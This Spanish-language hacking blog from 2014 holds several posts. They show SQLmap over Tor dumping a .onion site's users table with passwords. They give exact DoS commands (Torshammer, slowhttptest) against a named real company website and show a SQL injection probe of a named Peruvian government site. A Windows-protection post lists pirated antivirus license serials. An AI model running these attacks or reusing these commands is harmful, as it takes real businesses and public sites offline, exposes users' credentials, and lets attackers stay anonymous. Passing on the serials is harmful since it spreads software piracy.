HACKER ANGELWHITE GALC

martes, 18 de noviembre de 2014

SQLmap - Red Tor



  


Bueno hace poco a un amigo estaba que le enseñe un poco acerca de SQLi, fue muy divertida la conversación, luego nos inmiscuimos en el mundo de las páginas .onion (Deep Web), aqui fue la parte de la conversación donde me la parte mas divertida (El tiene mas experiencia que yo en esta parte del internet), como anteriormente ya habiamos conversado acerca de como explotar una vulnerabilidad SQLi, y a la vez recorde esas opciones que habia visto en la herramienta SQLmap.....Así que con ayuda de google me puse a buscar una web .onion con vulnerabilidad SQLi, y pues tuve suerte.... =) ....A continuacíon voy a mostrar como fue el proceso de extracción de datos del sitio .onion con ayuda la herramienta automatizada SQLmap  (SQLi).....Pues comenzemos...

Primero voy a activar Tor - Vidalia....(Anteriormente en mis primeros post enseñe como instalar Tor en BaCkTraCk5R3).




Despues de haber logrado activarlo vamos a la pestaña Edit y posteriormente Preferences. Ahora vamos a buscar cual es el puerto por el cual estamos conectados, en mi caso seria el port = 55980 y  mi  SOCKS sería SOCKSV5.




Una vez sabiendo nuestro Socks y nuestro puerto vamos a abrir nuestro SQLmap y ingresar nuestro objetivo a la cual vamos a explotar la vulnerabilidad que hemos podido encontrar. A continuación vamos a ingresar nuestro objetivo.

--chek-tor--->User Tor Anonymity Network
--tor-port--->Set Tor proxy port other than default
--tor-type --->Set Tor proxy type (HTTP (defacult ), SOCKS4 or SOCKS5)




Ahora vamos a ver si podemos extraer la información del servidor....Como podemos observar :

Get parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [Y/N]

Al parecer estamos con suerte  =D.......solo nos faltaria ingresar 'Y'.




Como pueden ya tenemos las bases de datos del sitio web, para continuar con nuestro pequeño viaje vamos a pedir las tablas de una de ellas.




En la siguiente imagen podemos observar todas las tablas de la base de datos que hemos escogido, y para poseguir vamos a pedir las columnas de una tabla que hemos elegido, en mi caso seria users.




Bueno aquí vamos a observar todas las columnas de la tabla users, y posteriormente vamos a pedir que nos muestra la información de todas columnas.




Para finalizar en la siguiente imagen se muestra la informacion de cada columnas: user_id,user_data,user_pass,user_name,user_level y user_mail.




Bueno para finalizar este pequeño post cabe resaltar que con  al usar Tor con SQLmap, podemos hacer que nuestras intrusiones a bases de datos ya sean .onion o .com sea de forma anónima, claro esta si dejamos de lado la vulnerabilidad que de la Red Tor.


Bueno creo que ya no tengo nadas mas que adicionar.....Así que me despido y sera hasta la próxima....Nos vemos...

lunes, 17 de noviembre de 2014

Torshammer


en esta ocacion les traigo una potente arma DoS , llamado Torshammer su codificación es  en  python.

link de descarga >  http://packetstormsecurity.com/files/download/98831/torshammer.tgz


creamos una carpeta llamada "Torshammer"  lo extraemos , en mi caso lo extraeré en Desktop " Escritorio"

abrimos la terminal entraremos a la carpeta y le daremos permisos.
pondremos lo siguiente

chmod 775 *

ahora vamos a ejecutar el Tors Hammer

./torshammer.py -t www.shougang.com.pe -r 900 -p 80



 Para ver si la web esta tumbada a nivel de toda la web pueden ingresar aqui

http://www.downforeveryoneorjustme.com/


 
Esto fue todo amigos. no olviden suscribirse en mi cuenta de facebook

hasta proxima.

Proxy Strike

Primeros Paso:
1 Auditar la Pagina que deseamos encontrar una vulnerabilidad
Este paso quizas suene un poco raro y algo nuevo para algunos ustedes en si, pero para poder dar un paso a penetrar ya sea una web o ordenador es encontrar un error /Bug del sistema sabian que un pequeño error puede abrir puertas para que una persona pueda entrar y salir como en su casa , pues es verdad ahora haremos un escaneo como un programa de Auditoria Web , llamado Proxy Strike la cual Podemos encontrar ya instalada en el Sistema Operativo Backtrack R3 , este eficas escanner es capas de dectectar diferentes tipos de vulnerabilidades entre ellas las mas famosas como son  los errores de SQL,XSS,RFI entre muchas mas.

Como vemos la estoy Abriendo Por la Terminal de Backtrack con la direccion donde esta alojado como lo pueden ver.


como vemos ya estamos en entorno grafico del ProxyStrike:



Como vemos en el menu de la Imagen grafica del ProxyStrike nos muestra varias barras las cuales son opciones que podemos realizar, pero nosotros vamos hacer una evaluacion de vulnerabilidades basicas . Vamos a entrar a la Seccion “Plugins vamos activar las Casillas que son Sql Inyeccion  y xss algo facil de hacer luego vamos a la seccion Crawler como vemos en la imagen vamos a poner la web que deseamos analizar en esta ocacion yo pondre esta web del gobierno de mi Pais :  http://www.ugelmariscalnieto.gob.pe/ activamos la casilla Crawl using Plugins y le daremos Stopped para que comienze a escanear.


Como vemos el escaneo ya esen  pleno proceso y empesara tanto a buscar los modulos de la web como las vulnerabilidades que en este caso es muy importante de hallar para poder explotarla una vez encontrada la vulnerabilidad nos vamos a la sección Plugins se acuerdan que hace momentos activamos SQL inyección, XSS, verdad ¿? Pues iremos a ver cómo están los informes.


Como vimos en la imagen anterior nos arrojó un error de la web, la cual es perteneciente al error SQL Inyección, la cual hablaremos más adelante sobre este error y como explotarlo con una herramienta tan conocida  el error encontrado fue el siguiente :
Si entramos en la web con ese link la web estaría normal como siempre, pero si nosotros
agregamos un valor como >> ', una comilla al costado del número izquierdo de esta manera
Las web nos botaran un error Como esta en la Imagen
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/home/ugelmoq/public_html/view_more_noticias.php on



Como vemos nos Arrojó el error que vemos en la imagen eso quiere decir que es vulnerable a una SQL inyección la  nos permite una penetración a la base de datos de la web y tener acceso a ver ya sea contrasas, usuarios, teléfonos, entre muchos datos de la web.

SlowhttpTest Uno de los Mejores DDos


Bueno Amigos Aca Les Traigo Otra Herramienta de " DDOS " llamada " SlowhttpTest "
Una de las mas poderosas ;) Para Tumbar Servidores en Segundos ! :D



Instalacion :

wget http://slowhttptest.googlecode.com/files/slowhttptest-1.5.tar.gz
tar -zxvf slowhttptest-1.5.tar.gz

cd slowhttptest-1.5
./configure
make
make install

ya en el directorio del slowhttptest , ingresaremos a la carpeta " src "
ahora ejecutaremos el slowhttptest :




Pondremos Este Scritp

./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.shougang.com.pe/ -p 3

Como Verán ya esta Atacando y en 5 segundos  la Web estará Tumbada .
El Slowhttptest es una De las mas fuertes herramientas de DDOS.


Para Otros Script :

./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 513 -y 1024 -n 5 -z 32 -k 3 -u http://www.shougang.com.pe/ -p 3 ls


./slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.shougang.com.pe/ -p 3


./slowhttptest -R -u http://www.shougang.com.pe/ -t HEAD -c 1000 -a 10 -b 3000 -r 500


./slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.shougang.com.pe/ -x 10 -p


./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://www.shougang.com.pe/ -x 24 -p 3

Como Proteger Nuestra PC De Instrusos Windows



Hola Cybernautas , Bueno en Este Post Les Traigo unas  3 Herramientas . Para Poderse Proteger De Espias , Intrusos , programas maliciosos como Exploit. etc

Mi Experiencia Cuando tenia windows, fue que una persona entro a mi pc, por medio de mastploit entoces desesperadamente pedi ayuda a un buen amigo que me envio estas 3 herramientas muy buenas y se las recomiento Mucho.
Ojo : Deben Estar Instaladas esas 3 herramientas Para que La Pc, Este Bien Protegida

Comenzemos:


iobit malware fighter


Link De Descarga http://majorgeeks.com/downloadget.php?id=6088&file=15&evp=5918647a8ed413bd6c60abd240a68891

Para Mayor Informacion :  http://www.iobit.com/malware-fighter.html
Serial : 1291B-7F914-A52C8-E90AF  ( ojo desconecten el internet y activan el serial )


Spybot



Link Descarga http://www.spybotupdates.biz/files/SpybotSD2.exe

Para Mayor Informacion : http://www.safer-networking.org/


MalwareBytes



Link de Descarga :  http://www.infospyware.com/antispyware/malwarebytes-antimalware/

Seriales :

(Seriales Cambiados al 5/1/13)

ID: 7MT93
Serial: WDM7-35LM-XHP5-8QE0

ID: 6SW32
Serial: AA8U-7KLB-HKV2-8RJX

ID: 3ER93
Serial: X0LQ-R3L1-PD7B-8RY3

ID: 3PQ44
Serial: NCUD-A3CA-Y55L-EBTF

ID: 1XK64
Serial: XY07-PED0-BF01-P5WC

ID: 9EF12
Serial: L1MF-0QYX-E3H8-CUW2

ID: 1BX13
Serial: A88F-0AM7-7E8U-VFHH

ID: 1SH78
Serial: 38PN-FQ2E-9T65-1QP5

ID: 1KV77
Serial: BAQA-1U1U-U9GB-PCY0

ID: 4VH13
Serial: NMKE-0KYP-K86P-AMQA

ID: 6KP11
Serial: NYYN-7B2V-H22N-YVQD



Espero Sea Muy utilez Estas herramientas de Proteccion para sus Ordenadores .                                

Escaneando Modulos Con Dirbuster



Al igual que nosotros buscamos las vulnerabilidades también debemos tener en cuenta analizar de una forma estándar los módulos de las web, ya que algunas veces encontramos paneles escondidos como archivos que pueden ser perjudiciales para la web misma entre documentos entre otros, para hacer el escaneo de dichos módulos utilizare el Dirbuster la cual es una herramienta programada para cumplir dicho procedimiento la cual esta incrementado tambn para hacer un brute forcé en el proceso , esta herramienta es diseñada por OWASP bueno vamos al ejemplo esta herramienta la podemos encontrar en el Backtrack R con la siguiente dirección del  Menú :


















Una  vez abierta la aplicacn vamos a poner el url de la web de deseamos auditar, luego en la opcn “Browsenos va salir una lista de ficheros las cuales vamos a escoger la siguiente “Directory-list-1.0.txt para comenzar  así como esta en esta imagen:



Una vez hecho todo el procedimiento se abri una nueva pestaña donde les aparecerán los módulos que están siendo procesados por el scanner como lo vemos en esta imagen:


Como vemos en esta imagen solo es un pequo fragmento de los dulos  encontrados ya que como verán es una lista muy grande de ver.